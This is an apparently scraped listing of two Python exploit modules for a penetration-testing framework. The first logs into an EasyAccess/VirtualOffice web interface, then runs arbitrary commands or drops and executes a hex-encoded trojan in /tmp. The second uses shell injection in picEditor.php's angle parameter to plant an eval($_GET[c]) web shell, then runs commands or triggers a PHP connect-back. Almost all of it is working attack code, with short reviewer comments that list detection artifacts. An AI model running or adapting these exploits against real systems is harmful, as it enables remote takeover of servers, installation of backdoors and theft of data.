        ``printf ... > /tmp/<trojanname>; chmod +x ...; /tmp/<trojanname>``
        chain.  Otherwise the supplied command is run and its output is read
        back through a web-reachable file.

        Returns 0 on authentication failure or when the command output is not
        available, 1 otherwise.

        On-host artifacts this leaves behind (useful for detection):
        ``/tmp/<trojanname>`` in stage mode, and
        ``/usr/src/EasyAccess/www/htdocs/images/d2`` (served as ``/images/d2``)
        in command mode.  The login request always goes to
        ``/cgi-bin/userLogin`` with a fixed Firefox/54 User-Agent.
        """
        # Check arguments
        self.host = self.target.interface
        self.port = int(self.argsDict.get("port", self.port))
        self.username = self.argsDict.get("username", self.username)
        self.password = self.argsDict.get("password", self.password)

        if (self.argsDict.get("cmd", self.cmd) == ""):
            # No command given: build a stage and run that instead.
            self.maketrojan()
            # Every byte of the stage as a printf hex escape (Python 2: iterating
            # a str yields one-character strings, hence ord()).
            hex_s = "".join("\\x%02x" % ord(b) for b in self.mosdeftrojan)
            self.TROJANMODE = 1
            # Write the stage to /tmp/<trojanname>, mark it executable, run it.
            self.cmd = "printf \"" + hex_s + "\" > /tmp/" + self.trojanname + "; chmod +x /tmp/" + self.trojanname + "; /tmp/" + self.trojanname
        else:
            # assumes TROJANMODE is initialised (e.g. to 0) elsewhere in the
            # class — its definition is not visible here.
            self.cmd = self.argsDict.get("cmd", self.cmd)

        self.setInfo("%s attacking %s:%d (in progress)" %
                     (NAME, self.host, self.port))
        self.log("Attacking %s:%d" % (self.host, self.port))

        ua = spkproxy.UserAgent("", exploit=self)
        ua.addHeader(
            "User-Agent",
            "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
        )

        # Authentication: form POST to the login CGI.
        url = "/cgi-bin/userLogin"
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        params = urllib.urlencode({
            'username': self.username,
            'password': self.password,
            'domain': 'LocalDomain',
            'loginButton': 'Login',
            'state': 'login',
            # NOTE(review): this literal appears masked in the listing; confirm
            # against the original module.
            'login': '******',
            'verifyCert': '0',
            'portalname': 'VirtualOffice',
            'ajax': 'true'
        })
        data = ua.POST(mainurl, params)

        # NOTE(review): if ua.POST can return None this membership test raises
        # TypeError — spkproxy is not visible here.
        if "Login failed" in data:
            self.log('[D2SEC] Authentication error')
            return 0

        # Exploitation
        if self.TROJANMODE == 1:
            # Stage mode: hex_s is handed to split_cmd (defined elsewhere;
            # presumably it delivers the string in pieces).
            self.split_cmd(ua, hex_s)
            pass  # no-op, kept as in the original
        else:
            # Command mode: clear any previous result file, run the command
            # with its output redirected into that file, then fetch it.
            self.send_cmd(ua, 'rm -f /usr/src/EasyAccess/www/htdocs/images/d2')
            self.cmd = '%s > /usr/src/EasyAccess/www/htdocs/images/d2' % self.cmd
            self.send_cmd(ua, self.cmd)

            url = "/images/d2"
            mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port,
                                        url)
            data = ua.GET(mainurl)

            if 'not available' in data:
                self.log('[D2SEC] Result not available')
                return 0
            else:
                self.log('[D2SEC] %s' % data)

        return 1
Ejemplo n.º 30
    def run(self):
        """Run the module: optionally test the target, then drive picEditor.php.

        Arguments are collected by ``self.getargs()``.  When ``self.version``
        is 0 the target is first checked with ``self.test()``; a negative
        result is logged and 0 is returned.  A ``spkproxy.UserAgent`` is built
        from the ``http``/``https`` scheme (``self.ssl``), ``self.host``,
        ``self.basepath``, an optional ``spkproxy.BasicAuth`` and
        ``self.hostname`` as the virtual host.

        Two modes:

        * ``self.command`` set: the command is wrapped in
          ``print(startz);passthru('...');print(endz);`` and its output is cut
          out of the response between the ``startz``/``endz`` markers.
        * otherwise: the PHP produced by ``self.get_php_to_mosdef()`` is sent
          and a PHP connect-back is then looked for.

        Both modes issue the same two requests: a POST to ``picEditor.php``
        whose ``angle`` parameter carries shell metacharacters that copy
        ``anycontent.php`` to ``albums/edit/index.php`` and rewrite it to
        ``eval($_GET[c])``, then a GET of ``albums/edit/index.php?c=...``.
        ``albums/edit/index.php`` is the on-disk artifact left on the target.

        Returns the value of ``self.ISucceeded()``, which alone decides the
        final status string (truthy means success).
        """
        self.getargs()

        self.setInfo("%s attacking %s:%d (in progress)" %
                     (NAME, self.host, self.port))

        # version 0: probe with self.test() first and stop if it does not
        # find a vulnerable target.
        if self.version == 0:
            ret = self.test()
            if not ret:
                self.log("Testing didn't find vulnerable target")
                return 0

        self.log("Attacking %s:%d" % (self.host, self.port))
        self.log("Basic Auth User: %s" % self.basicauth_user)
        self.log("VHost: %s" % self.hostname)
        if self.ssl:
            protocol = "https"
        else:
            protocol = "http"

        #If we have to do basic-auth, let's get an object from spkproxy here
        if self.basicauth_user:
            auth = spkproxy.BasicAuth(self.basicauth_user,
                                      self.basicauth_password)
        else:
            auth = None

        # Base URL is <scheme>://<host>/<basepath>; later requests are relative.
        UA = spkproxy.UserAgent(protocol + "://" + self.host + "/" +
                                self.basepath,
                                auth=auth,
                                hostname=self.hostname,
                                exploit=self)

        if self.command:
            self.log("Command: %s" % self.command)
            command = self.command
            # Bracket the command output with startz/endz so it can be cut out
            # of the response body below.  The command is interpolated into
            # single quotes unescaped.
            command = "print(startz);passthru('" + command + "');print(endz);"
            # Shell injection through the angle parameter: copies anycontent.php
            # to albums/edit/index.php and sed-rewrites it to eval($_GET[c]).
            data = UA.POST(
                "picEditor.php",
                "newimage=../../images/edit.gif&angle=10;cp%20anycontent.php%20albums/edit/index.php;sed%20-i%20s/php/@eval\(\$_GET[c]\)\;die\(\)\;/%20albums/edit/index.php;"
            )
            data = UA.GET("albums/edit/index.php?c=%s" %
                          (urllib.quote_plus(command)))
            if "startz" in data:
                result = data.split("startz")[1].split("endz")[0]
                #self.log("Command data: %s"%prettyprint(data))
                self.log("Command result=%s" % prettyprint(result))
                # NOTE(review): this value is overwritten by the ISucceeded()
                # call after the if/else, so it never reaches the caller.
                ret = 1
            else:
                self.log("Command not run - service patched?!")
        else:
            command = self.get_php_to_mosdef().strip()
            # Every "/" is replaced by a shell expansion that yields the first
            # character of pwd (a "/" for an absolute cwd); presumably to avoid
            # sending a literal slash — the original leaves the reason unstated.
            command = command.replace("/", "`pwd|cut -b1`")
            self.log("Command: %s" % command)
            self.log("Sending Exploit")
            # Same two requests as the command branch (see above).
            data = UA.POST(
                "picEditor.php",
                "newimage=../../images/edit.gif&angle=10;cp%20anycontent.php%20albums/edit/index.php;sed%20-i%20s/php/@eval\(\$_GET[c]\)\;die\(\)\;/%20albums/edit/index.php;"
            )
            data = UA.GET("albums/edit/index.php?c=%s" %
                          (urllib.quote_plus(command)))
            self.log("Data=%s" % data)
            self.log("Looking for PHP connectback")
        # Success is decided solely by ISucceeded() (defined elsewhere); any
        # ret assigned above is discarded here.
        ret = self.ISucceeded()

        if ret:
            self.setInfo("%s attacking %s:%d - done (success!)" %
                         (NAME, self.host, self.port))
        else:
            self.setInfo("%s attacking %s:%d - done (failed)" %
                         (NAME, self.host, self.port))
        return ret